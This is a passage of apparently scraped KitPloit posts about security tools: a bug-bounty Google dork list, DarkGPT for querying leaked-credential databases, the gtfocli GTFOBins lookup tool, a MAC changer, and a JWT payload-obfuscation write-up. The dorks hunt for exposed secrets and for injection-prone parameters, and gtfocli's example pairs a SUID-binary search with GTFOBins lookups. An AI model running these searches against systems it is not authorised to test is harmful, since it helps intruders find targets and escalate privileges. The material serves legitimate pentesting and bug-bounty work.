href="https://blogger.googleusercontent.com/img/a/AVvXsEhDLbbZ1CDYrrsQvm4Ln_X6brlGyEQz8mQQeBoPjikFZ0Jh8oK7WwmVJqcWQf2hw04jlzyMG4cbO3WDbPTp1fAffwi8-kuwYsd_yRttLh3CFpqi6n_IuJRqXchBtU7J7SLPty4FAQf9X0yisSrr-7wYe9mFKe6dgWSVrVidzkxv2QgtXmgINciJEhOOZYA"><img alt="" border="0" height="640" id="BLOGGER_PHOTO_ID_7345705598837786290" src="https://blogger.googleusercontent.com/img/a/AVvXsEhDLbbZ1CDYrrsQvm4Ln_X6brlGyEQz8mQQeBoPjikFZ0Jh8oK7WwmVJqcWQf2hw04jlzyMG4cbO3WDbPTp1fAffwi8-kuwYsd_yRttLh3CFpqi6n_IuJRqXchBtU7J7SLPty4FAQf9X0yisSrr-7wYe9mFKe6dgWSVrVidzkxv2QgtXmgINciJEhOOZYA=w612-h640" width="612" /></a> <a href="https://blogger.googleusercontent.com/img/a/AVvXsEjydxtve6oyE__RmQRhp61aApBrAlLVHiSw-DvAKGRHOhUY9LU3wUNK5ckw_ZpEY_UDEnokDJ6p3j-aRZeU3pj3Li3VNiHw_o5Vq091h-4LUy_3M4osR2lrsGv7OG_8Mxi44M7F9dcSmgw3sdjtaA3zTXnAOAIOIVazuKsQQHs4LfEf9Pa04FDUk_PLxMA"><img alt="" border="0" height="640" id="BLOGGER_PHOTO_ID_7345705607758732882" src="https://blogger.googleusercontent.com/img/a/AVvXsEjydxtve6oyE__RmQRhp61aApBrAlLVHiSw-DvAKGRHOhUY9LU3wUNK5ckw_ZpEY_UDEnokDJ6p3j-aRZeU3pj3Li3VNiHw_o5Vq091h-4LUy_3M4osR2lrsGv7OG_8Mxi44M7F9dcSmgw3sdjtaA3zTXnAOAIOIVazuKsQQHs4LfEf9Pa04FDUk_PLxMA=w352-h640" width="352" /></a> <a href="https://blogger.googleusercontent.com/img/a/AVvXsEhaYNG_yti0seVzgB1gjBDD5ktu2HG1EeOdS7UrqzMAb9usSnv3jDYbTJAhOGuMbsnopIuzzp4-3LH8KLq8voTLXfF2UL8CKZ00PzReyHi4dmrSWgZ8V6CpNVCQCvdQHYQGjCgdXXyLGgiUIynwgX_4toVqGPsLfhDEVcj3tOcJ5v9_WzZOJ4xCgOPtDc4"><img alt="" border="0" height="624" id="BLOGGER_PHOTO_ID_7345705610000417314" src="https://blogger.googleusercontent.com/img/a/AVvXsEhaYNG_yti0seVzgB1gjBDD5ktu2HG1EeOdS7UrqzMAb9usSnv3jDYbTJAhOGuMbsnopIuzzp4-3LH8KLq8voTLXfF2UL8CKZ00PzReyHi4dmrSWgZ8V6CpNVCQCvdQHYQGjCgdXXyLGgiUIynwgX_4toVqGPsLfhDEVcj3tOcJ5v9_WzZOJ4xCgOPtDc4=w640-h624" width="640" /></a> <a 
href="https://blogger.googleusercontent.com/img/a/AVvXsEhS9SkrWat9tOWBKqXbQCPVNOxcfikv60H-BdqvOhfJcvnbR1YtdRnGojRmDgvsu8UfVSBlRg25xwROSXuSyBfAcn989nm7spS8sJkLgX0SegvjB3XtBvh5cr_ZOgwSrD-NA46hf6s4J-yEcfhk9AlFTEpzO2theT7HDh09FDVkZiAu0pOgbC630RykSXM"><img alt="" border="0" height="596" id="BLOGGER_PHOTO_ID_7345705613876228946" src="https://blogger.googleusercontent.com/img/a/AVvXsEhS9SkrWat9tOWBKqXbQCPVNOxcfikv60H-BdqvOhfJcvnbR1YtdRnGojRmDgvsu8UfVSBlRg25xwROSXuSyBfAcn989nm7spS8sJkLgX0SegvjB3XtBvh5cr_ZOgwSrD-NA46hf6s4J-yEcfhk9AlFTEpzO2theT7HDh09FDVkZiAu0pOgbC630RykSXM=w640-h596" width="640" /></a> <a href="https://blogger.googleusercontent.com/img/a/AVvXsEgJPTq8xInSdKBSa6BpVZrGhvdkXRJH1rb7CetGHsi4B3F7pl33CFHbd7alSnVcmhZWg7jQjc2sNggHFP6AqZxgpBfHfTBczqCUw7qHvAv8t8ky7qRpD5m4drv7EvVcDNcYraQWrWCGynX7eotRtmEXwIaIjQsfkZILhteFJ2b_Nk3lZUThfxrzG4HYUw8"><img alt="" border="0" height="380" id="BLOGGER_PHOTO_ID_7345705617714872402" src="https://blogger.googleusercontent.com/img/a/AVvXsEgJPTq8xInSdKBSa6BpVZrGhvdkXRJH1rb7CetGHsi4B3F7pl33CFHbd7alSnVcmhZWg7jQjc2sNggHFP6AqZxgpBfHfTBczqCUw7qHvAv8t8ky7qRpD5m4drv7EvVcDNcYraQWrWCGynX7eotRtmEXwIaIjQsfkZILhteFJ2b_Nk3lZUThfxrzG4HYUw8=w640-h380" width="640" /></a> <a href="https://blogger.googleusercontent.com/img/a/AVvXsEjMCv7sNhBT8dY8DPILQufguMCSZXZmeWVRykEQ06TQfoZQpIu9EQurcJ63GHM6xniOe9thhwhu2NPTRKPQQUiGywXb22ocozWu9ghXB9xlE2r6867oVbrfOfg6rYwh7_pFYMzYbEKLGgTZfPBhUV-RXoGxlxROpqnTtVTEvZ2zwd-mJYFCkinVYLu6dTg"><img alt="" border="0" height="576" id="BLOGGER_PHOTO_ID_7345705622803912882" src="https://blogger.googleusercontent.com/img/a/AVvXsEjMCv7sNhBT8dY8DPILQufguMCSZXZmeWVRykEQ06TQfoZQpIu9EQurcJ63GHM6xniOe9thhwhu2NPTRKPQQUiGywXb22ocozWu9ghXB9xlE2r6867oVbrfOfg6rYwh7_pFYMzYbEKLGgTZfPBhUV-RXoGxlxROpqnTtVTEvZ2zwd-mJYFCkinVYLu6dTg=w640-h576" width="640" /></a></p><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/akhomlyuk/pyradm" rel="nofollow" target="_blank" 
title="Download Pyradm">Download Pyradm</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-47449134233814466432024-03-14T08:30:00.007-03:002024-03-14T08:30:00.232-03:00Google-Dorks-Bug-Bounty - A List Of Google Dorks For Bug Bounty, Web Application Security, And Pentesting<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjw0SFLnTOabwaCF-I0fJ6yf9HM_V7lWJyZlAobhJIAzGdn_CJPabbnBf9lYrvxKLgSP5jXfjQJHQVE3QF96d7DULS1GG5pvCY_a_PwnWTNsWfZv4CALnW3SVIeEmcDyNYqShxDQkjrjqjWNO4U94AiOUbGCBHOxpmDwzmU4-lUnGab3GFyihV4TfGMPqfv"><img alt="" border="0" height="122" id="BLOGGER_PHOTO_ID_7345638495062138434" src="https://blogger.googleusercontent.com/img/a/AVvXsEjw0SFLnTOabwaCF-I0fJ6yf9HM_V7lWJyZlAobhJIAzGdn_CJPabbnBf9lYrvxKLgSP5jXfjQJHQVE3QF96d7DULS1GG5pvCY_a_PwnWTNsWfZv4CALnW3SVIeEmcDyNYqShxDQkjrjqjWNO4U94AiOUbGCBHOxpmDwzmU4-lUnGab3GFyihV4TfGMPqfv=w640-h122" width="640" /></a></p><p><br /></p> <p>A list of Google Dorks for Bug Bounty, Web Application Security, and Pentesting</p> <p><a href="https://taksec.github.io/google-dorks-bug-bounty/" rel="nofollow" target="_blank" title="Live Tool">Live Tool</a></p> <span><a name='more'></a></span><p><br /></p> <p><a href="https://twitter.com/TakSec" rel="nofollow" target="_blank" title="A list of Google Dorks for Bug Bounty, Web Application Security, and Pentesting (3)"></a></p> <h3>Broad domain search w/ negative search</h3> <blockquote> <p>site:example.com -www -shop -share -ir -mfa</p> </blockquote> <h3>PHP extension w/ parameters</h3> <blockquote> <p>site:example.com ext:php inurl:?</p> </blockquote> <h3>Disclosed <a href="https://www.kitploit.com/search/label/XSS" target="_blank" title="XSS">XSS</a> and Open Redirects</h3> <blockquote> <p>site:openbugbounty.org inurl:reports intext:"example.com"</p> </blockquote> <h3>Juicy Extensions</h3> <blockquote> <p>site:"example[.]com" ext:log | ext:txt | ext:conf | ext:cnf | ext:ini | ext:env | ext:sh | ext:bak | 
ext:backup | ext:swp | ext:old | ext:~ | ext:git | ext:svn | ext:htpasswd | ext:htaccess</p> </blockquote> <h3>XSS prone parameters</h3> <blockquote> <p>inurl:q= | inurl:s= | inurl:search= | inurl:query= | inurl:keyword= | inurl:lang= inurl:& site:example.com</p> </blockquote> <h3>Open Redirect prone parameters</h3> <blockquote> <p>inurl:url= | inurl:return= | inurl:next= | inurl:redirect= | inurl:redir= | inurl:ret= | inurl:r2= | inurl:page= inurl:& inurl:http site:example.com</p> </blockquote> <h3>SQLi Prone Parameters</h3> <blockquote> <p>inurl:id= | inurl:pid= | inurl:category= | inurl:cat= | inurl:action= | inurl:sid= | inurl:dir= inurl:& site:example.com</p> </blockquote> <h3>SSRF Prone Parameters</h3> <blockquote> <p>inurl:http | inurl:url= | inurl:path= | inurl:dest= | inurl:html= | inurl:data= | inurl:domain= | inurl:page= inurl:& site:example.com</p> </blockquote> <h3>LFI Prone Parameters</h3> <blockquote> <p>inurl:include | inurl:dir | inurl:detail= | inurl:file= | inurl:folder= | inurl:inc= | inurl:locate= | inurl:doc= | inurl:conf= inurl:& site:example.com</p> </blockquote> <h3>RCE Prone Parameters</h3> <blockquote> <p>inurl:cmd | inurl:exec= | inurl:query= | inurl:code= | inurl:do= | inurl:run= | inurl:read= | inurl:ping= inurl:& site:example.com</p> </blockquote> <h3>High % inurl keywords</h3> <blockquote> <p>inurl:config | inurl:env | inurl:setting | inurl:backup | inurl:admin | inurl:php site:example[.]com</p> </blockquote> <h3>Sensitive Parameters</h3> <blockquote> <p>inurl:email= | inurl:phone= | inurl:password= | inurl:secret= inurl:& site:example[.]com</p> </blockquote> <h3>API Docs</h3> <blockquote> <p>inurl:apidocs | inurl:api-docs | inurl:swagger | inurl:api-explorer site:"example[.]com"</p> </blockquote> <h3>Code Leaks</h3> <blockquote> <p>site:pastebin.com "example.com"</p> <p>site:jsfiddle.net "example.com"</p> <p>site:codebeautify.org "example.com"</p> <p>site:codepen.io "example.com"</p> </blockquote> <h3>Cloud Storage</h3> <blockquote> 
<p>site:s3.amazonaws.com "example.com"</p> <p>site:blob.core.windows.net "example.com"</p> <p>site:googleapis.com "example.com"</p> <p>site:drive.google.com "example.com"</p> <p>site:dev.azure.com "example[.]com"</p> <p>site:onedrive.live.com "example[.]com"</p> <p>site:digitaloceanspaces.com "example[.]com"</p> <p>site:sharepoint.com "example[.]com"</p> <p>site:s3-external-1.amazonaws.com "example[.]com"</p> <p>site:s3.dualstack.us-east-1.amazonaws.com "example[.]com"</p> <p>site:dropbox.com/s "example[.]com"</p> <p>site:box.com/s "example[.]com"</p> <p>site:docs.google.com inurl:"/d/" "example[.]com"</p> </blockquote> <h3>JFrog Artifactory</h3> <blockquote> <p>site:jfrog.io "example[.]com"</p> </blockquote> <h3>Firebase</h3> <blockquote> <p>site:firebaseio.com "example[.]com"</p> </blockquote> <h3>File upload endpoints</h3> <blockquote> <p>site:example.com "choose file"</p> </blockquote> <h2>Dorks that work better w/o domain</h2> <h3>Bug Bounty programs and <a href="https://www.kitploit.com/search/label/Vulnerability" target="_blank" title="Vulnerability">Vulnerability</a> Disclosure Programs</h3> <blockquote> <p>"submit vulnerability report" | "powered by bugcrowd" | "powered by hackerone"</p> <p>site:*/security.txt "bounty"</p> </blockquote> <h3>Apache Server Status Exposed</h3> <blockquote> <p>site:*/server-status apache</p> </blockquote> <h3>WordPress</h3> <blockquote> <p>inurl:/wp-admin/admin-ajax.php</p> </blockquote> <h3>Drupal</h3> <blockquote> <p>intext:"Powered by" & intext:Drupal & inurl:user</p> </blockquote> <h3>Joomla</h3> <blockquote> <p>site:*/joomla/login</p> </blockquote> <hr /> <p>Medium articles for more dorks:</p> <p>https://thegrayarea.tech/5-google-dorks-every-hacker-needs-to-know-fed21022a906</p> <p>https://infosecwriteups.com/uncover-hidden-gems-in-the-cloud-with-google-dorks-8621e56a329d</p> <p>https://infosecwriteups.com/10-google-dorks-for-sensitive-data-9454b09edc12</p> <p>Top Parameters:</p> 
<p>https://github.com/lutfumertceylan/top25-parameter</p> <p>Proviesec dorks:</p> <p>https://github.com/Proviesec/google-dorks</p><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/TakSec/google-dorks-bug-bounty" rel="nofollow" target="_blank" title="Download Google-Dorks-Bug-Bounty">Download Google-Dorks-Bug-Bounty</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-7402030000778680112024-03-13T08:30:00.001-03:002024-03-13T08:30:00.133-03:00DarkGPT - An OSINT Assistant Based On GPT-4-200K Designed To Perform Queries On Leaked Databases, Thus Providing An Artificial Intelligence Assistant That Can Be Useful In Your Traditional OSINT Processes<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgMuN4qfzQxuoBy88dkXEM1GjaTgAN-BgZ6i-pcphCnL4pzkW7TGP5NgTmVYq0SjPUmyXWAJjK71njnn25nI9m0mgfYRiSU_c7iHYf3j60H76V486B96efUCcvKnz0ReYz2OPNQz0uBZeq_E1jVOrMG6wosEvjsWMJGA-nhM-XUJpnCTZkYBbgkpD2zFekv"><img alt="" border="0" height="248" id="BLOGGER_PHOTO_ID_7345627338818753346" src="https://blogger.googleusercontent.com/img/a/AVvXsEgMuN4qfzQxuoBy88dkXEM1GjaTgAN-BgZ6i-pcphCnL4pzkW7TGP5NgTmVYq0SjPUmyXWAJjK71njnn25nI9m0mgfYRiSU_c7iHYf3j60H76V486B96efUCcvKnz0ReYz2OPNQz0uBZeq_E1jVOrMG6wosEvjsWMJGA-nhM-XUJpnCTZkYBbgkpD2zFekv=w640-h248" width="640" /></a></p><p style="text-align: center;"><br /></p> <p>DarkGPT is an <a href="https://www.kitploit.com/search/label/Artificial%20Intelligence" target="_blank" title="artificial intelligence">artificial intelligence</a> assistant based on GPT-4-200K designed to perform queries on <a href="https://www.kitploit.com/search/label/Leaked" target="_blank" title="leaked">leaked</a> databases. 
This guide will help you set up and run the project on your local environment.</p><span><a name='more'></a></span><p><br /></p> <h2>Prerequisites</h2> <p>Before starting, make sure you have Python installed on your system. This project has been tested with Python 3.8 and higher versions.</p> <h2>Environment Setup</h2> <ol> <li><strong>Clone the Repository</strong></li> </ol> <p>First, clone the GitHub repository to your local machine by running the following commands in your terminal:</p> <pre><code>git clone https://github.com/luijait/DarkGPT.git<br />cd DarkGPT<br /></code></pre> <ol start="2"> <li><strong>Configure Environment Variables</strong></li> </ol> <p>You will need to set up some environment variables for the script to work correctly. Copy the <code>.env.example</code> file to a new file named <code>.env</code> and fill in your key:</p> <pre><code>DEHASHED_API_KEY="your_dehashed_api_key_here"<br /></code></pre> <ol start="3"> <li><strong>Install Dependencies</strong></li> </ol> <p>This project requires certain Python packages to run. Install them by running the following command:</p> <pre><code>pip install -r requirements.txt<br /></code></pre> <ol start="4"> <li><strong>Run the Project</strong></li> </ol> <p>
Then run the project:</p> <pre><code>python3 main.py<br /></code></pre><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/luijait/DarkGPT" rel="nofollow" target="_blank" title="Download DarkGPT">Download DarkGPT</a></span></b></div><p>2024-03-12 Gtfocli - GTFO Command Line Interface For Easy Binaries Search Commands That Can Be Used To Bypass Local Security Restrictions In Misconfigured Systems</p><h2 style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjoe_UC5LKL6el8Xe7jBJUZ4ObCy5rVf9zMVptF_X4KtkRqUOH5msMmzAoEYcAHXdQ3D7O6wYYmgYxEBGy43tmVsOMHtng7QsYOGlPwM42Ij7vdJP1kEqeQqq3oanLaX6kjy7vWARpuOZcVVv6HAKHHhhN4SOlujwkELkMlWHUwh1ursuK6RTNxWE5q83XZ"><img alt="" border="0" height="210" id="BLOGGER_PHOTO_ID_7345624906969636530" src="https://blogger.googleusercontent.com/img/a/AVvXsEjoe_UC5LKL6el8Xe7jBJUZ4ObCy5rVf9zMVptF_X4KtkRqUOH5msMmzAoEYcAHXdQ3D7O6wYYmgYxEBGy43tmVsOMHtng7QsYOGlPwM42Ij7vdJP1kEqeQqq3oanLaX6kjy7vWARpuOZcVVv6HAKHHhhN4SOlujwkELkMlWHUwh1ursuK6RTNxWE5q83XZ=w640-h210" width="640" /></a></h2><p><br /></p> <p><code>GTFOcli</code> is a <a href="https://www.kitploit.com/search/label/Command%20Line" target="_blank" title="Command Line">Command Line</a> Interface for easy binaries search commands that can be used to bypass local security <a href="https://www.kitploit.com/search/label/Restrictions" target="_blank" title="restrictions">restrictions</a> in misconfigured systems.</p><span><a name='more'></a></span><p><br /></p> <h2>Installation</h2> <p>Using <code>go</code>:</p> <pre><code>go install github.com/cmd-tools/gtfocli@latest<br /></code></pre> <p>Using <code>homebrew</code>:</p> <pre><code>brew tap cmd-tools/homebrew-tap<br />brew install gtfocli<br /></code></pre> <p>Using <code>docker</code>:</p> <pre><code>docker pull 
cmdtoolsowner/gtfocli<br /></code></pre> <h2>Usage</h2> <h3>Search for Unix binaries</h3> <p>Search for <a href="https://www.kitploit.com/search/label/Binary" target="_blank" title="binary">binary</a> <code>tar</code>:</p> <pre><code>gtfocli search tar<br /></code></pre> <p>Search for binary <code>tar</code> from <code>stdin</code>:</p> <pre><code>echo "tar" | gtfocli search<br /></code></pre> <p>Search for binaries listed in a file:</p> <pre><code>cat myBinaryList.txt<br />/bin/bash<br />/bin/sh<br />tar<br />arp<br />/bin/tail<br /><br />gtfocli search -f myBinaryList.txt<br /></code></pre> <h3>Search for Windows binaries</h3> <p>Search for binary <code>Winget.exe</code>:</p> <pre><code>gtfocli search Winget --os windows<br /></code></pre> <p>Search for binary <code>Winget</code> from <code>stdin</code>:</p> <pre><code>echo "Winget" | gtfocli search --os windows<br /></code></pre> <p>Search for binaries listed in a file:</p> <pre><code>cat windowsExecutableList.txt<br />Winget<br />c:\\Users\\Desktop\\Ssh<br />Stordiag<br />Bash<br />c:\\Users\\Runonce.exe<br />Cmdkey<br />c:\dir\subDir\Users\Certreq.exe<br /><br />gtfocli search -f windowsExecutableList.txt --os windows<br /></code></pre> <p>Search for binary <code>Winget</code> and print output in <code>yaml</code> format (see <code>-h</code> for available formats):</p> <pre><code>gtfocli search Winget -o yaml --os windows<br /></code></pre> <h3>Search using the dockerized solution</h3> <p>Examples:</p> <p>Search for binary <code>Winget</code> and print output in <code>yaml</code> format:</p> <pre><code>docker run -i cmdtoolsowner/gtfocli search Winget -o yaml --os windows<br /></code></pre> <p>Search for binary <code>tar</code> and print output in <code>json</code> format:</p> <pre><code>echo 'tar' | docker run -i cmdtoolsowner/gtfocli search -o json<br /></code></pre> <p>Search for binaries listed in a file mounted as a volume in the container:</p> <pre><code>cat myBinaryList.txt<br />/bin/bash<br />/bin/sh<br 
/>tar<br />arp<br />/bin/tail<br /><br />docker run -i -v $(pwd):/tmp cmdtoolsowner/gtfocli search -f /tmp/myBinaryList.txt<br /></code></pre> <h2>CTF</h2> <p>An example of common use case for <code>gtfocli</code> is together with <code>find</code>:</p> <pre><code>find / -type f \( -perm 04000 -o -perm -u=s \) -exec gtfocli search {} \; 2>/dev/null<br /></code></pre> <p>or</p> <pre><code>find / -type f \( -perm 04000 -o -perm -u=s \) 2>/dev/null | gtfocli search<br /></code></pre> <h2>Credits</h2> <p>Thanks to <a href="https://gtfobins.github.io/" rel="nofollow" target="_blank" title="GTFOBins">GTFOBins</a> and <a href="https://lolbas-project.github.io/" rel="nofollow" target="_blank" title="LOLBAS">LOLBAS</a>, without these projects <code>gtfocli</code> would never have come to light.</p> <h2>Contributing</h2> <p>You want to contribute to this project? Wow, thanks! So please just fork it and send a pull request.</p><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/cmd-tools/gtfocli" rel="nofollow" target="_blank" title="Download Gtfocli">Download Gtfocli</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-16852404691714193012024-03-11T08:30:00.005-03:002024-03-11T08:30:00.134-03:00n0Mac - Yet Another Mac Changer!!!<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnqQaVINxH2k3nx6UvFjh7i0pBQqg6JTOPwrot6M64uOk9r54CETlnG2_pZlRRZWhu0phd-YEdxvyHV8BbAPO3NkkFottAnMM5X81xz_tx5wlJF8K9D3Izj3cLrz7eGCNP8XWuWxCgdWeDYGKPJD71-qHkkUnmErgarZmO9DBCYr6rIifvwK4LZdgXiPG4/s897/mac-chnager.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="507" data-original-width="897" height="362" 
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnqQaVINxH2k3nx6UvFjh7i0pBQqg6JTOPwrot6M64uOk9r54CETlnG2_pZlRRZWhu0phd-YEdxvyHV8BbAPO3NkkFottAnMM5X81xz_tx5wlJF8K9D3Izj3cLrz7eGCNP8XWuWxCgdWeDYGKPJD71-qHkkUnmErgarZmO9DBCYr6rIifvwK4LZdgXiPG4/w640-h362/mac-chnager.png" width="640" /></a></div><p><br /></p> <p>This script changes the MAC address of the network interface to a randomly generated address on system startup using crontab. It then uses the <a href="https://www.kitploit.com/search/label/Macchanger" target="_blank" title="macchanger">macchanger</a> command to generate a list of MAC address vendors and selects one at random and then combines that vendor prefix with a randomly generated suffix to create the new MAC address.</p><span><a name='more'></a></span><p><br /></p> <p>Note: This tool is intended for educational purposes only. It is not intended for any malicious activities or any other illegal activities. By using this tool, you agree to the terms and conditions set forth in the disclaimer and accept full responsibility for any misuse of the tool. 
The author of this tool is not liable for any damages or losses resulting from the use or misuse of this tool by anyone.</p> <br /><span style="font-size: large;"><b>Installation</b></span><br /> <ul> <li>chmod +x install.sh</li> <li>./install.sh</li> </ul> <br /><span style="font-size: large;"><b>Usage</b></span><br /> <ul> <li>chmod +x n0Mac.sh</li> <li>./n0Mac.sh</li> </ul><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/chaudharyarjun/n0Mac" rel="nofollow" target="_blank" title="Download n0Mac">Download n0Mac</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-36129257561929026772024-03-10T08:30:00.004-03:002024-03-10T08:30:00.149-03:00Some-Tweak-To-Hide-Jwt-Payload-Values - A Handful Of Tweaks And Ideas To Safeguard The JWT Payload<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjIIIRZK_8csXBiKKQLqCeLs-CZNovGymbzKzySW41ZXxwADbUGQxcdTjcvihz5pof-7kFR7g6fFdNdgJb3iXMh34P3DkZIv_Y6TDcY7rt4UitfjxCplkNCgKI80hFx4Z0acJO89AiG9dS0j_QcBLqmKmRW5x124dYZ1EdCql94VdwBPYsnsOImtzCXxq5Y"><img alt="" border="0" height="488" id="BLOGGER_PHOTO_ID_7343002266969214786" src="https://blogger.googleusercontent.com/img/a/AVvXsEjIIIRZK_8csXBiKKQLqCeLs-CZNovGymbzKzySW41ZXxwADbUGQxcdTjcvihz5pof-7kFR7g6fFdNdgJb3iXMh34P3DkZIv_Y6TDcY7rt4UitfjxCplkNCgKI80hFx4Z0acJO89AiG9dS0j_QcBLqmKmRW5x124dYZ1EdCql94VdwBPYsnsOImtzCXxq5Y=w640-h488" width="640" /></a></p><div><br /></div><span style="font-size: x-large;"><b>some-tweak-to-hide-jwt-payload-values</b></span><ul> <li>a handful of tweaks and ideas to safeguard the JWT payload, making it futile to attempt decoding by constantly altering its value, <br /> ensuring the decoded output remains unintelligible while imposing minimal <a href="https://www.kitploit.com/search/label/Performance" target="_blank" title="performance">performance</a> overhead.</li> </ul><span><a 
name='more'></a></span><div><br /></div> <br /><span style="font-size: large;"><b>What is a JWT Token?</b></span><br /> <p>A JSON Web Token (JWT, pronounced "jot") is a compact and URL-safe way of passing a JSON message between two parties. It's a standard, defined in RFC 7519. The token is a long string, divided into parts separated by dots. Each part is base64 URL-encoded.</p> <p>What parts the token has depends on the type of the JWT: whether it's a JWS (a signed token) or a JWE (an encrypted token). If the token is signed it will have three sections: the header, the payload, and the signature. If the token is encrypted it will consist of five parts: the header, the encrypted key, the initialization vector, the <a href="https://www.kitploit.com/search/label/Ciphertext" target="_blank" title="ciphertext">ciphertext</a> (payload), and the <a href="https://www.kitploit.com/search/label/Authentication" target="_blank" title="authentication">authentication</a> tag. Probably the most common use case for JWTs is to utilize them as <a href="https://www.kitploit.com/search/label/Access%20Tokens" target="_blank" title="access tokens">access tokens</a> and ID tokens in OAuth and OpenID Connect flows, but they can serve different purposes as well.</p> <br /><span style="font-size: large;"><b>Primary Objective of this Code Snippet</b></span><br /> <p>This code snippet offers a tweak aimed at enhancing the security of the payload section of a JWT, whose stored keys and values are visible in plaintext once the token is decoded. Typically, the payload section appears in plaintext when decoded from the JWT token (base64). The main objective is to lightly encrypt or obfuscate the payload values, making it difficult to discern their meaning. 
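</p> <p>The encryption and decryption steps listed under "userid" below, carried through end to end as an added example (this is not the repository's main.py): it assumes MD5 for the timestamp hash, since the preview shows 32 hex digits, signs with HS256 using only the standard library, and takes the XOR key and JWT secret from the README's preview. Because XOR with a fixed key leaves equal plaintext bytes equal, every token for one user starts with the same Base64 prefix (VVZcUUFTX14F in the preview); that is the sense in which the Notes call this a starting point rather than something inherently secure.</p>

```python
import base64
import hashlib
import hmac
import json
import time

# Example values taken from the README's preview output.
XOR_KEY = b"generally_user_salt_or_hash_or_random_uuid_this_value_must_be_in_dbms"
JWT_SECRET = "yes_your_service_jwt_secret_key"


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data with the key, cycling the key if the data is longer."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def obfuscate_userid(userid: str, timestamp: int, key: bytes) -> str:
    """Build '<userid>|<hash(timestamp)>', XOR it with the key and Base64-encode it.

    The README does not name the hash; its preview shows 32 hex digits, so MD5 is
    assumed here. The userid prefix is identical in every token, so the first
    bytes of the XOR output (and the Base64 prefix) never change: obfuscation only."""
    digest = hashlib.md5(str(timestamp).encode()).hexdigest()
    plain = f"{userid}|{digest}".encode()
    return base64.b64encode(xor_bytes(plain, key)).decode()


def deobfuscate_userid(value: str, key: bytes) -> str:
    """Reverse obfuscate_userid and return only the user ID part before '|'."""
    plain = xor_bytes(base64.b64decode(value), key).decode()
    userid, _sep, _hashed_ts = plain.partition("|")
    return userid


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def jwt_encode_hs256(payload: dict, secret: str) -> str:
    """Minimal HS256 JWS using only the standard library (no PyJWT)."""
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = _b64url(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(secret.encode(), f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{_b64url(sig)}"


def signature_is_valid(token: str, secret: str) -> bool:
    """Pin the algorithm to HS256, recompute the HMAC and compare in constant time."""
    try:
        header, body, sig = token.split(".")
        alg = json.loads(_b64url_decode(header)).get("alg")
    except ValueError:
        return False
    if alg != "HS256":
        return False
    expected = hmac.new(secret.encode(), f"{header}.{body}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(_b64url_decode(sig), expected)


def issue_token(userid: str, xor_key: bytes, jwt_secret: str, now: int = None) -> str:
    """Issue a token whose 'userid' claim is the obfuscated value, as in the preview."""
    ts = int(time.time() if now is None else now)
    payload = {
        "timestamp": time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime(ts)),
        "userid": obfuscate_userid(userid, ts, xor_key),
    }
    return jwt_encode_hs256(payload, jwt_secret)


def resolve_userid(token: str, xor_key: bytes, jwt_secret: str) -> str:
    """Verify the signature first; only then unwrap the obfuscated user ID."""
    if not signature_is_valid(token, jwt_secret):
        raise ValueError("JWT signature check failed")
    payload = json.loads(_b64url_decode(token.split(".")[1]))
    return deobfuscate_userid(payload["userid"], xor_key)
```

<p>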
The intention is to ensure that even if someone attempts to decode the payload values, they cannot do so easily.</p> <br /><span style="font-size: large;"><b>userid</b></span><br /> <ul> <li>The code snippet targets the key named "userid" stored in the payload section as an example.</li> <li>The choice of "userid" stems from its frequent use for user identification or authentication purposes once the token has been validated (e.g., checked that it has not expired).</li> </ul> <p>The idea behind attempting to obscure the value of the key named "userid" is as follows:</p> <br /><b>Encryption:</b><br /> <ul> <li>The timestamp is hashed, joined to the user ID with a "|" delimiter, and the result is encrypted by a bitwise XOR operation.</li> <li>The XOR operation uses a symmetric key.</li> <li>The resulting value is then encoded using Base64.</li> </ul> <br /><b>Decryption:</b><br /> <ul> <li>The encrypted data is decoded using Base64.</li> <li>Decryption is performed by an XOR operation with the same symmetric key.</li> <li>The original user ID and hashed timestamp are revealed in plaintext.</li> <li>The user ID part is extracted by splitting at the "|" delimiter for relevant use and purposes.</li> </ul> <br /><b>Symmetric Key for XOR Encoding:</b><br /> <ul> <li>Various materials can be utilized for this key.</li> <li>It could be a salt used in conventional password hashing, an arbitrary random string, a generated UUID, or any other suitable material.</li> <li>However, this key should be securely stored in the <a href="https://www.kitploit.com/search/label/Database%20Management" target="_blank" title="database management">database management</a> system (DBMS).</li> </ul> <p>and..^^</p> <pre><code>in the example, the key is shown as { 'userid': 'random_value' },<br />making it apparent that it represents a user ID.<br /><br />However, this is merely for illustrative purposes.<br /><br />In practice, a predetermined and undisclosed name is typically used.<br />For example, 'a': 
